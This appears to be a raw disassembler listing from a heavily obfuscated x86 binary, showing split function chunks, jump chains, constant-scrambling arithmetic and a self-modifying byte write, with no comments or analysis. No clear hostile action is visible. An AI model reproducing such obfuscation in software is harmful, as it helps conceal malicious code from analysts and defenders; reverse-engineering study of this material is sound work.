; START	OF FUNCTION CHUNK FOR sub_4478AB

loc_454BBE:				; CODE XREF: sub_4478AB-3962j
		jmp	sub_444FB1
; END OF FUNCTION CHUNK	FOR sub_4478AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4532AD

loc_454BC3:				; CODE XREF: sub_4532AD:loc_445050j
		jmp	ds:off_41E0B4
; END OF FUNCTION CHUNK	FOR sub_4532AD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_454BC9:				; CODE XREF: sub_442DF0-2538j
		jmp	loc_448AF1
; END OF FUNCTION CHUNK	FOR sub_442DF0

; =============== S U B	R O U T	I N E =======================================



sub_454BCE	proc near		; CODE XREF: sub_45024C:loc_444892j
					; sub_44F817-1818j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043EF7D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441223 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DC65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F60 SIZE 0000000E BYTES

		jno	loc_452F60
		xchg	edi, [esp+0]
		mov	edx, edi
		sub	edi, 0ACB94058h
		jmp	loc_43EF7D
sub_454BCE	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442700

loc_454BE4:				; CODE XREF: sub_442700:loc_43CF9Bj
		push	edi
		push	0BB9F167Dh
		pop	edi
		and	edi, 1687757Bh
		rol	edi, 1Ah
		jmp	loc_43F16C
; END OF FUNCTION CHUNK	FOR sub_442700

; =============== S U B	R O U T	I N E =======================================



sub_454BF9	proc near		; DATA XREF: sub_444A86+7o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043DEC9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440F27 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00444368 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00451631 SIZE 00000011 BYTES

		mov	edx, ebx
		pop	ebx
		jo	loc_440F27
		mov	eax, [esp+0]
		push	edx
		call	sub_44E481
		mov	eax, 26F528F2h

loc_454C10:				; CODE XREF: k2vbe3.d:loc_4542D6j
		push	eax
		jmp	loc_43DEC9
sub_454BF9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_454C16:				; CODE XREF: k2vbe3.d:loc_450EA7j
		and	ebx, 2F3814h
		mov	[ebp+0], edx
; START	OF FUNCTION CHUNK FOR sub_449372

loc_454C1F:				; CODE XREF: sub_449372+7B28j
		rol	eax, 1
		add	eax, 0E2433C8Fh
		call	sub_4496A2

loc_454C2C:				; CODE XREF: k2vbe3.d:0043CB26j
		jmp	loc_4430E9
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
		ror	ecx, 16h
		or	esi, ebx
		jmp	sub_43E932
; ---------------------------------------------------------------------------

loc_454C3B:				; DATA XREF: sub_44CB04o
		js	loc_453578
		pop	edx
		mov	eax, [esp]
		push	edx
		jmp	loc_450337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_454C4B:				; CODE XREF: sub_44D9A7-5054j
		mov	ecx, ebx
		pop	ebx
		or	ecx, 6FCC1258h
		xor	ecx, 7B2FD328h
		sub	ecx, 15EA59B3h
		add	ecx, 16DB197h
		jmp	loc_44F011
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_454C6B:				; CODE XREF: sub_446E24+ACB4j
		jge	loc_4406D1
		not	eax
		jmp	loc_444C72
; ---------------------------------------------------------------------------

loc_454C78:				; CODE XREF: sub_446E24:loc_4589BAj
		jz	loc_453238
		jmp	loc_453D65
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_454C83:				; CODE XREF: sub_4529E2-3585j
		and	eax, 0FFD2B3E0h
		sub	eax, 1057E8A6h
		and	eax, 2E654144h
		cmp	eax, 0EE1588F8h
		jmp	loc_44F4DA
; END OF FUNCTION CHUNK	FOR sub_4529E2

; =============== S U B	R O U T	I N E =======================================



sub_454CA0	proc near		; DATA XREF: sub_43C3A9+19418o

var_4		= dword	ptr -4

		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		retn
sub_454CA0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_454CA7:				; CODE XREF: k2vbe3.d:0044F2FFj
		jmp	loc_4453C1

; =============== S U B	R O U T	I N E =======================================



sub_454CAC	proc near		; CODE XREF: sub_43D7A9:loc_43F876p

; FUNCTION CHUNK AT 0044817F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044F4F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C321 SIZE 0000000A BYTES

		push	ebp
		jmp	loc_44817F
sub_454CAC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_454CB2:				; CODE XREF: sub_44E90D:loc_4466D3j
		call	sub_458F37

loc_454CB7:				; CODE XREF: k2vbe3.d:00454930j
		jmp	loc_44AB36
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529D2

loc_454CBC:				; CODE XREF: sub_4529D2:loc_43C5F8j
		and	edi, 30B0447Ch
		jnz	loc_4572BB
; END OF FUNCTION CHUNK	FOR sub_4529D2
; START	OF FUNCTION CHUNK FOR sub_441FEB

loc_454CC8:				; CODE XREF: sub_441FEB+Bj
		jmp	loc_453FC6
; END OF FUNCTION CHUNK	FOR sub_441FEB
; ---------------------------------------------------------------------------
		add	ebp, ebx
		jmp	loc_4572B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_454CD4:				; CODE XREF: sub_43F7AC:loc_43E9D5j
		push	ecx
		call	sub_45AF0E
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; START	OF FUNCTION CHUNK FOR sub_4536DC

loc_454CDA:				; CODE XREF: sub_4536DC+769j
		jmp	nullsub_210
; END OF FUNCTION CHUNK	FOR sub_4536DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445541

loc_454CDF:				; CODE XREF: sub_445541-7FFBj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_445541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_454CE4:				; CODE XREF: sub_43F34C-3192j
		jmp	loc_440B84
; END OF FUNCTION CHUNK	FOR sub_43F34C

; =============== S U B	R O U T	I N E =======================================



sub_454CE9	proc near		; DATA XREF: k2vbe3.d:00451A1Eo

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00444083 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044412F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00451AFE SIZE 00000005 BYTES

		push	edx
		push	edi
		push	2B5CD8A5h
		sbb	edi, edx
		jmp	loc_451AFE
sub_454CE9	endp

; ---------------------------------------------------------------------------

locret_454CF7:				; CODE XREF: k2vbe3.d:00446FA6j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D345

loc_454CF8:				; CODE XREF: sub_44D345-9645j
		jmp	nullsub_175
; END OF FUNCTION CHUNK	FOR sub_44D345
; ---------------------------------------------------------------------------
		jz	loc_43E682
		mov	eax, ebp
		jmp	loc_456778
; ---------------------------------------------------------------------------

loc_454D0A:				; CODE XREF: k2vbe3.d:0044FF0Fj
		mov	eax, 0B2h
		call	sub_44ADEC
		jmp	loc_458983
; ---------------------------------------------------------------------------
		jmp	loc_444C96
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_454D1E:				; CODE XREF: sub_44C90E-96E4j
					; sub_44E542+17j ...
		jb	loc_43F292
		cmp	dword ptr [ebp-10Ch], 36343831h
		jmp	loc_447838
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_451234
		jmp	loc_4444BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449067

loc_454D40:				; CODE XREF: sub_449067+66D6j
		mov	edx, edi
		pop	edi
		mov	eax, [esp+0]
		push	ebp
		jmp	loc_43F19C
; END OF FUNCTION CHUNK	FOR sub_449067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A60

loc_454D4C:				; CODE XREF: sub_459A60:loc_44497Aj
		jnz	loc_458D64
		jmp	loc_459C54
; END OF FUNCTION CHUNK	FOR sub_459A60
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_269. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_454D58:				; CODE XREF: sub_440CEA+8j
		jmp	loc_453D2C
; END OF FUNCTION CHUNK	FOR sub_440CEA
; ---------------------------------------------------------------------------

loc_454D5D:				; CODE XREF: k2vbe3.d:004421EFj
		jnz	loc_4555D6
		jmp	loc_449E26
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_454D68:				; CODE XREF: sub_43F2E0+Ej
		push	dword ptr [ebp-4]
		call	sub_45A21D
		push	eax
		push	0D20F01E5h
		pop	eax
		jmp	loc_441600
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; ---------------------------------------------------------------------------

loc_454D7C:				; CODE XREF: k2vbe3.d:0044F781j
		jnz	loc_450430
		jmp	loc_444D94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F174

loc_454D87:				; CODE XREF: sub_44F174+Ej
					; sub_4542E1:loc_4542ECj
		push	edx
		push	9A64556Fh
		pop	edx
		rol	edx, 0Ah
		xor	edx, 69BB83F6h
		sub	edx, 65E7123Ah
		jmp	loc_440D4B
; END OF FUNCTION CHUNK	FOR sub_44F174
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_454DA2:				; CODE XREF: sub_4426DF:loc_45B295j
		pop	edi
		xor	edi, 406D46C8h
		add	edi, 37A348D8h
		test	edi, 80h
		jmp	loc_43DD77
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4524D2

loc_454DBA:				; CODE XREF: sub_4524D2-DD75j
		jnz	loc_44FD18
		mov	eax, [ebp-14h]
		mov	eax, [eax+24h]
		add	eax, [ebp-4]
		jmp	loc_44EE61
; END OF FUNCTION CHUNK	FOR sub_4524D2
; ---------------------------------------------------------------------------

loc_454DCE:				; CODE XREF: k2vbe3.d:00457AC9j
		sbb	edx, 4984DF92h
		mov	eax, [edi]
		ror	ebp, 0Dh
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_454DD9:				; CODE XREF: sub_440C94+16E24j
		xor	eax, 2531E2FBh
		sub	eax, ds:4000EEh
		jmp	loc_4594E9
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_454DEA:				; CODE XREF: sub_4440E5:loc_44BAC8j
		jnz	loc_444874
		jmp	loc_45B19D
; END OF FUNCTION CHUNK	FOR sub_4440E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_454DF5:				; CODE XREF: sub_44F028:loc_45B426j
		jz	loc_45A77F
		jmp	loc_44EC14
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441850

loc_454E00:				; CODE XREF: sub_441850+1004Bj
		call	sub_444615
		push	9089FC15h
		pop	eax
		rol	eax, 14h
		add	eax, 9528E06h
		call	sub_451759
		mov	ds:off_41E024, eax
		call	sub_441850
; END OF FUNCTION CHUNK	FOR sub_441850
; START	OF FUNCTION CHUNK FOR sub_449661

loc_454E24:				; CODE XREF: sub_449661-18C7j
		jmp	loc_44DDE0
; END OF FUNCTION CHUNK	FOR sub_449661
; ---------------------------------------------------------------------------

loc_454E29:				; CODE XREF: k2vbe3.d:004428E4j
		xor	edi, ds:4000F2h
		rol	edi, 0Dh
		jnb	loc_45A127
; START	OF FUNCTION CHUNK FOR sub_448735

loc_454E38:				; CODE XREF: sub_448735+Aj
		jmp	nullsub_177
; END OF FUNCTION CHUNK	FOR sub_448735
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EBB

loc_454E3D:				; CODE XREF: sub_454EBB-E626j
		jmp	loc_4420A6
; END OF FUNCTION CHUNK	FOR sub_454EBB
; ---------------------------------------------------------------------------
		mov	ebx, 37B4E847h
		jmp	loc_45A116
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E971

loc_454E4C:				; CODE XREF: sub_44E971+Fj
		jnz	loc_44B306
		jmp	loc_444B8A
; END OF FUNCTION CHUNK	FOR sub_44E971
; ---------------------------------------------------------------------------

loc_454E57:				; CODE XREF: k2vbe3.d:loc_44293Bj
					; k2vbe3.d:00442954j
		or	ebx, 6447D004h
		cmp	ebx, 48949880h
		jmp	loc_43D6C7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_105. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_454E69	proc near		; CODE XREF: k2vbe3.d:0044B157j
					; sub_44FF34+Ap

var_C		= dword	ptr -0Ch
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043C79C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E0A4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043EF60 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004405C4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441326 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00441916 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441B63 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442721 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004437BD SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004445AA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044519F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044818E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004494DE SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044A873 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044ADBD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B3BA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044BB5A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044CACB SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044DA80 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045003C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450B2B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450EAC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451546 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00451790 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451F3C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004534DA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045409A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004559E9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045821F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004586F2 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00459CE0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045B430 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045BBB7 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045BD13 SIZE 0000000C BYTES

		xchg	eax, [esp-4+arg_0]
		pop	eax
		mov	[ebx], eax
		pop	ebx
		push	66B8EA13h
		xchg	edx, [esp-8+arg_4]
		jmp	loc_442721
sub_454E69	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_249. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_454E7E:				; CODE XREF: sub_4479A1-5E7Dj
		jmp	loc_456B34
; END OF FUNCTION CHUNK	FOR sub_4479A1

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_454E83	proc near		; CODE XREF: k2vbe3.d:0043EA61p
					; k2vbe3.d:00449EC5p ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C316 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043C347 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D7C8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EB28 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043FBDC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440A81 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044849C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D7F7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E8AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FE2F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452FF8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454284 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045450C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455A09 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045729D SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00458241 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00458698 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459B9C SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0045A78D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B4FC SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0045B51E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045C290 SIZE 00000013 BYTES

		push	ebp
		mov	ebp, esp
		push	eax
		mov	eax, ecx
		jmp	loc_45B4FC
sub_454E83	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_111. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_454E8F:				; CODE XREF: sub_44C90E+CEF7j
		jmp	loc_451BFF
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457865

loc_454E94:				; CODE XREF: sub_457865+Fj
		jmp	loc_448504
; END OF FUNCTION CHUNK	FOR sub_457865
; ---------------------------------------------------------------------------

loc_454E99:				; CODE XREF: k2vbe3.d:loc_44D268j
		jnz	loc_448DEF
		jmp	loc_456F31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E135

loc_454EA4:				; CODE XREF: sub_43E135+1E217j
		jo	loc_440E48

loc_454EAA:				; CODE XREF: sub_43E135:loc_44044Dj
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_451F5C
		jmp	loc_459F2A
; END OF FUNCTION CHUNK	FOR sub_43E135

; =============== S U B	R O U T	I N E =======================================



sub_454EBB	proc near		; DATA XREF: k2vbe3.d:00447AEAo

; FUNCTION CHUNK AT 0043E329 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004420A6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446891 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00448D8E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004505E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453D5B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454E3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E78 SIZE 00000013 BYTES

		shl	eax, cl
		and	edx, eax
		jb	loc_446891

loc_454EC5:				; CODE XREF: k2vbe3.d:loc_454371j
		setnz	byte ptr [ebp-5]
		call	sub_4414DA
		mov	edx, ds:dword_441774
		mov	ebx, [edx]
		sub	ebx, eax
		jmp	loc_4505E9
sub_454EBB	endp


; =============== S U B	R O U T	I N E =======================================



sub_454EDD	proc near		; CODE XREF: sub_445F6E-77CFp
					; sub_453DF7+11j

; FUNCTION CHUNK AT 0043E297 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442AB4 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00449F32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C072 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D666 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004507D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454B23 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00455A44 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458E5C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00459D75 SIZE 0000000E BYTES

		xchg	ecx, [esp+0]

loc_454EE0:				; CODE XREF: k2vbe3.d:00455A25j
		pop	ecx
		mov	[ecx], eax
		pop	ecx
		mov	eax, [ebp-10h]

loc_454EE7:				; CODE XREF: sub_453AE8:loc_44BF75j
		jmp	loc_459D75
sub_454EDD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_454EEC:				; CODE XREF: sub_45B74D:loc_4405D4j
		push	4C0BDC9Eh
		pop	ecx
		rol	ecx, 15h
		xor	ecx, 3E13422Eh
		test	ecx, 2

loc_454F01:				; CODE XREF: k2vbe3.d:00455DAEj
		jmp	loc_45595F
; END OF FUNCTION CHUNK	FOR sub_45B74D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_245. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_454F07:				; CODE XREF: k2vbe3.d:00441F7Bj
		jmp	loc_45028C
; ---------------------------------------------------------------------------

loc_454F0C:				; CODE XREF: k2vbe3.d:loc_44697Fj
		jz	loc_4433F0
		jmp	loc_447902
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EB3F

loc_454F17:				; CODE XREF: sub_44EB3F:loc_455A9Fj
		xchg	edi, [esp+8+var_8]
		jmp	sub_447E90
; END OF FUNCTION CHUNK	FOR sub_44EB3F

; =============== S U B	R O U T	I N E =======================================



sub_454F1F	proc near		; DATA XREF: sub_44DF16:loc_456B77o
		add	eax, 75892698h
		mov	eax, [eax]
		push	offset loc_44213F
		jmp	sub_45AFD3
sub_454F1F	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_337. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4455EE

loc_454F32:				; CODE XREF: sub_4455EE+1j
		jmp	loc_4508F5
; END OF FUNCTION CHUNK	FOR sub_4455EE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_468. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_454F38:				; CODE XREF: k2vbe3.d:0045A270j
		jle	loc_44DE40

; =============== S U B	R O U T	I N E =======================================



sub_454F3E	proc near		; CODE XREF: sub_44BDBB+844Fp
					; k2vbe3.d:loc_456090j

arg_0		= dword	ptr  4

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	edx, [esp-4+arg_0]
		jmp	sub_451759
sub_454F3E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		rol	esi, 11h
		jmp	loc_4541C1
; ---------------------------------------------------------------------------

loc_454F52:				; CODE XREF: k2vbe3.d:0045948Dj
		rol	ecx, 0Ch
		add	ecx, 91738462h
		xchg	ecx, [esp]
		jmp	loc_4587D9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_454F63:				; CODE XREF: sub_44B2D7+68FEj
		push	eax
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+14h+var_14]
		push	0F12C51C1h
		pop	ecx
		rol	ecx, 1Ch
		jmp	loc_458675
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CAB

loc_454F78:				; CODE XREF: sub_449CAB+6E59j
		jl	loc_451868

loc_454F7E:				; CODE XREF: k2vbe3.d:0043D39Bj
		jmp	loc_442FDC
; END OF FUNCTION CHUNK	FOR sub_449CAB
; ---------------------------------------------------------------------------
		not	edi
		sbb	edi, 43756B01h
		jmp	loc_451863
; ---------------------------------------------------------------------------
		ror	ecx, 1Ah
		jmp	sub_452DD6
; ---------------------------------------------------------------------------

loc_454F98:				; CODE XREF: k2vbe3.d:00452DA9j
		jno	loc_43FF81
		pushf

; =============== S U B	R O U T	I N E =======================================



sub_454F9F	proc near		; CODE XREF: sub_445124+EFE1p

; FUNCTION CHUNK AT 0043C093 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043C9CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EA2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004413AB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E3E8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F7B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453900 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004579D4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045C202 SIZE 00000017 BYTES

		xchg	edx, [esp+0]
		pop	edx
		jmp	loc_43EA2E
sub_454F9F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_454FA8	proc near		; DATA XREF: k2vbe3.d:004403EFo

; FUNCTION CHUNK AT 00442898 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444B7A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044B229 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450ADE SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045735F SIZE 00000011 BYTES

		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_44DA5C
		or	eax, eax
		jmp	loc_442898
sub_454FA8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_454FB8:				; CODE XREF: sub_452CF7-B2F9j
					; sub_43C3A9:loc_44D943j
		push	176F61EEh
		pop	eax
		sub	eax, 776E567Fh
		rol	eax, 16h
		or	eax, 1C10BBA6h
		xor	eax, 7D5CAE31h
		jmp	loc_44190C
; END OF FUNCTION CHUNK	FOR sub_452CF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_454FD8:				; CODE XREF: sub_446E24+B4BDj
		jnz	loc_447289
		jmp	loc_451ACB
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

loc_454FE3:				; CODE XREF: k2vbe3.d:0043CDEEj
		jge	loc_451534
		js	loc_4428FE
		jmp	loc_451528
; ---------------------------------------------------------------------------

loc_454FF4:				; CODE XREF: k2vbe3.d:00449D83j
		xchg	ecx, [esp]
		push	2ABAB99Dh
		pop	ebx
		or	ebx, 0B6BE34C2h
		rol	ebx, 0Ah
		or	ebx, 0D2A0252Fh
		add	ebx, 54D89F8h
		xchg	ebx, [esp]
; START	OF FUNCTION CHUNK FOR sub_43CF35

loc_455015:				; CODE XREF: sub_43CF35+17506j
		jmp	sub_446E1E
; END OF FUNCTION CHUNK	FOR sub_43CF35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_45501A:				; CODE XREF: sub_458725:loc_4411B0j
					; sub_44B979:loc_4483A1j
		jge	loc_44EDDD

loc_455020:				; CODE XREF: sub_459B61+7j
		jmp	loc_43F66E
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------

loc_455025:				; CODE XREF: k2vbe3.d:00449B7Aj
		jmp	loc_43C548
; ---------------------------------------------------------------------------
		or	ecx, edi
		xchg	ecx, [ebp+0]
		jmp	loc_44EDCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_455034:				; CODE XREF: sub_44D0D5:loc_44B9FBj
		xor	eax, 930B1649h
		call	sub_4572F6
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; START	OF FUNCTION CHUNK FOR sub_444BEA

loc_45503F:				; CODE XREF: sub_444BEA+12563j
		jmp	nullsub_235
; END OF FUNCTION CHUNK	FOR sub_444BEA
; ---------------------------------------------------------------------------

loc_455044:				; CODE XREF: k2vbe3.d:loc_4413A5j
		jle	loc_43D0ED

; =============== S U B	R O U T	I N E =======================================



sub_45504A	proc near		; CODE XREF: k2vbe3.d:00451DAEp

; FUNCTION CHUNK AT 0045B86E SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [eax],	0C3h
		jmp	loc_45B86E
sub_45504A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_455056:				; CODE XREF: sub_445124:loc_44E8C8j
		mov	eax, [eax]
		push	eax
		push	28h
		mov	eax, [ebp-4]
		push	eax
		jmp	loc_454538
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_455064:				; CODE XREF: sub_45C041-11392j
		cmp	ebx, 1C4F0CC0h
		jmp	loc_44D18E
; END OF FUNCTION CHUNK	FOR sub_45C041
; ---------------------------------------------------------------------------

